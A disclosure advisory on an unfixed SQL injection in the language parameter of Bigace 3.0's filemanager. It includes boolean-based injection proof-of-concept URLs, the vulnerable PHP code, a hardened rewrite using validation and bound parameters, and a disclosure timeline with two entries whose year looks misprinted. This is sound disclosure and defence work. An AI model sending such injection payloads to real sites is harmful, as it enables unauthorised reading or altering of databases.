Bigace 3.0: SQL Injection

Date: 2016-01-28 09:56:34
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Bigace 3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.bigace.de/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of curesec GmbH

2. Overview

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

Bigace is a CMS written in PHP. In version 3.0, the language parameter of the filemanager is open to SQL injection.

A user account is needed to exploit this issue, but it can belong to the group "Anonymous", which is the lowest privilege level; the account does not need any rights associated with it.

3. Proof of Concept

The two requests differ only in the injected condition (1=1 versus 1=2) and return different results:

http://localhost//bigace_3.0/public/index.php/filemanager/itemtype/index/?itemtype=4&language=en%27%20and%201=1%20--%20-
-> true

http://localhost//bigace_3.0/public/index.php/filemanager/itemtype/index/?itemtype=4&language=en%27%20and%201=2%20--%20-
-> false

4. Code

/library/Bigace/Item/Walker.php

public function assemble()
{
    [...]
    $languageID = $req->getLanguageID();
    [...]
    if (!is_null($languageID) && $languageID != '') {
        // $languageID comes from the request and is concatenated into the SQL string unescaped
        $extension .= " AND a.language='".$languageID."' ";
    } else {
        // if we do not request a special language, we cannot group by id
        // because we would only get back the first (only one!) result "by id"
        // and not all language versions
        $groupBy = 'a.id, a.language';
    }
    [...]
    $sql .= " ".$joinExtension." WHERE a.cid={CID} ".$extension." GROUP BY ".$groupBy." ".$order." " . $limit;
    return $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sql, $values, true);
}
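The following is an added example and not Bigace code: it rebuilds the concatenation pattern from the snippet above in isolation, shows how the advisory's PoC payload changes the resulting SQL, and places a hardened version next to it that validates the language ID against an allowlist pattern and binds it as a PDO parameter. The table and column names (item, id, cid, language, name), the sample rows and the PDO/SQLite setup are assumptions chosen to mirror the query in the advisory.

```php
<?php
// Added example (not Bigace code). Assumes the pdo_sqlite extension is available.
declare(strict_types=1);

// Vulnerable: the language ID is concatenated into the SQL string. A single
// quote in the parameter terminates the literal and the remainder of the
// value is interpreted as SQL, which is what the advisory's PoC demonstrates.
function buildVulnerableSql(int $cid, ?string $languageID): string
{
    $extension = '';
    if (!is_null($languageID) && $languageID != '') {
        $extension .= " AND a.language='" . $languageID . "' ";
    }
    return "SELECT a.id, a.language, a.name FROM item a WHERE a.cid=" . $cid . " " . $extension;
}

// Hardened, step 1: reject anything that is not a plausible language code
// before it reaches the database layer. Language IDs are short tokens such
// as "en", "de" or "en_US"; a quote, space or comment marker is never legitimate.
function isValidLanguageID(string $languageID): bool
{
    return preg_match('/\A[a-z]{2,3}(?:[_-][A-Za-z]{2,4})?\z/', $languageID) === 1;
}

// Hardened, step 2: bind the value as a parameter. Even if validation were
// bypassed, the driver transmits it as data, never as part of the SQL text.
function fetchItemsSafe(PDO $pdo, int $cid, ?string $languageID): array
{
    $sql = "SELECT a.id, a.language, a.name FROM item a WHERE a.cid = :cid";
    $params = [':cid' => $cid];

    if ($languageID !== null && $languageID !== '') {
        if (!isValidLanguageID($languageID)) {
            throw new InvalidArgumentException('Invalid language ID');
        }
        $sql .= " AND a.language = :lang";
        $params[':lang'] = $languageID;
    }
    $sql .= " ORDER BY a.id";

    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration on an in-memory SQLite database with constructed sample rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE item (id INTEGER, cid INTEGER, language TEXT, name TEXT)");
$pdo->exec("INSERT INTO item VALUES (1, 1, 'en', 'Home'), (2, 1, 'de', 'Start'), (3, 2, 'en', 'Other')");

// The advisory's PoC payload (language=en%27%20and%201=1%20--%20-), URL-decoded.
$payload = "en' and 1=1 -- -";

echo "Vulnerable query built from the payload:\n";
echo buildVulnerableSql(1, $payload), "\n\n";   // the WHERE clause now ends in "and 1=1 -- -"

echo "Hardened query with a legitimate language ID:\n";
print_r(fetchItemsSafe($pdo, 1, 'en'));

echo "Hardened query with the payload:\n";
try {
    fetchItemsSafe($pdo, 1, $payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Validation and binding are deliberately kept as two separate layers: the allowlist check rejects the PoC payload at the input boundary and produces a loggable event, while the bound parameter guarantees that any value which does reach the query cannot alter its structure.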

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 CVE Requested, but not assigned
12/10/2015 Reminded Vendor of Disclosure Date
12/14/2015 Vendor requests more time
01/10/2015 Reminded Vendor of Disclosure Date
01/17/2015 Vendor discontinued project
01/28/2016 Disclosed to public